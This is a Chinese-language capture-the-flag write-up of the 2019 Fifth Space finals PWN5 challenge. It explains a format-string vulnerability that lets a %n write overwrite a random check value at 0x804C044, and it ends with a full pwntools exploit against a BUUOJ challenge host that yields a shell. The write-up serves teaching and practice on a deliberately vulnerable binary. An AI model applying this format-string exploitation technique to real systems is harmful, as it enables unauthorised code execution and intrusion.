[第五空间2019 决赛]PWN5
[第五空间2019 决赛]PWN5
使用checksec查看:
![[第五空间2019 决赛]PWN5_第1张图片](http://img.e-com-net.com/image/info8/b95e2c70e6ac4bab9d5ffc9d620bf65c.jpg)
开启了Canary和栈不可执行。
放进IDA中分析:
![[第五空间2019 决赛]PWN5_第2张图片](http://img.e-com-net.com/image/info8/81a1e8620c024341a2a12a7edc3f1fd8.jpg)
printf(&buf);:存在格式化字符串漏洞。if ( atoi(&nptr) == unk_804C044 ) { puts("ok!!"); system("/bin/sh"); }:用户第二次输入的字符串和unk_804C044中的相同就可以拿到权限。fd = open("/dev/urandom", 0); read(fd, &unk_804C044, 4u);:unk_804C044中的数据是随机的,存在bss段上。
题目思路
- 存在字符串格式化漏洞。
- 可以通过字符串格式化漏洞将
unk_804C044中的数据固定。 - 第二次输入固定的值就可以getshell。
步骤解析
首先要确定偏移位
![[第五空间2019 决赛]PWN5_第3张图片](http://img.e-com-net.com/image/info8/42298366394b43679a82b5eb3e2305c1.jpg)
可以确定偏移为10。
接着就构造payload:
b"M%10$n" + p64(0x804C044)也可以通过
fmtstr_payload()函数。第二次输入
1就能够getshell
![[第五空间2019 决赛]PWN5_第4张图片](http://img.e-com-net.com/image/info8/eaf6532d8687481abd4daf689ef8a70e.jpg)
完整exp
from pwn import *
#start
r = remote("node4.buuoj.cn",28121)
# r = process("../buu/[第五空间2019 决赛]PWN5")
#params
#attack
payload = b"M%10$n" + p64(0x804C044)
# payload = fmtstr_payload(10,{0x804C044:0x1})
r.recvuntil('name:')
r.sendline(payload)
r.recvuntil('passwd:')
r.sendline("1")
r.interactive()